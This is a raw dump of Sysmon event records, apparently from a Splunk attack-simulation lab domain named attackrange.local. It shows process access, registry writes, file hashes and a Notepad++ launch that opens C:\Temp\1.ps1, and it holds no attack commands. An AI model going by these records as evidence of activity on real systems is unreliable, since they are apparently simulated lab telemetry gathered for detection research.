Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.429{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDCF3453CF8EE640B5B4C5B00B2659D7,SHA256=92B26786174C6B2058B726897C578F2694AD9DDDF38E08FB197096A5DB5AF631,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.310{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.295{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.295{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x80000000000000001049260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.279{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=DA1208D94E9033F38833BC9F444D31F8,SHA256=4C98AD479E9B783AE7BE148610107981758F6626D16C0B36204AD67ACD6751F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}10285088C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001049258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-VerSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\BinProductVersion8.1.1.0 13241300x80000000000000001049257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-CompileTimeClaimSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\LinkDate07/01/2021 12:16:04 13241300x80000000000000001049256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-PubSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\Publisherdon ho don.h@free.fr 13241300x80000000000000001049255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDB-PathSetValue2021-07-12 07:53:18.265{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe\REGISTRY\A\{9f972113-78f6-bff2-599d-b5479e19cde8}\Root\InventoryApplicationFile\notepad++.exe|9b63189e96115672\LowerCaseLongPathc:\program files\notepad++\notepad++.exe 354300x80000000000000001049254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:09.966{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57277-false10.0.1.14win-dc-890.attackrange.local49676- 13241300x80000000000000001049253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localInvDBSetValue2021-07-12 07:53:18.179{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Notepad++\notepad++.exeBinary Data 10341000x80000000000000001049252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.163{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.163{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+29cc|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.152{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" -multiInstC:\Program Files\Notepad++\ATTACKRANGE\Administrator{466BC892-F4ED-60EB-AA0C-FC0400000000}0x4fc0caa3HighMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\1.ps1" 10341000x80000000000000001049243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.129{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-427D-00000000CF01}9832C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.095{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4EE-60EB-427D-00000000CF01}9832C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.095{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-427D-00000000CF01}9832C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.052{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.052{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.032{466BC892-02B0-60E8-1600-00000000CF01}13048524C:\Windows\System32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.032{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.032{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.010{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:18.010{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.010{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4ED-60EB-417D-00000000CF01}10008C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:19.633{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E071AA05509E5347D89795D7D7FE6EBE,SHA256=2C30E7DA3F105839F114A4FCB8F2FC64B78601D5F6E9239175736DFF053E6B43,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:19.209{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4734AF5001D3047EF9CD8885953BD54E,SHA256=3642F5B65E248E4802704BD16D8C6348A82C36A94DFDEE1DC7861CD1D9371CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:19.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 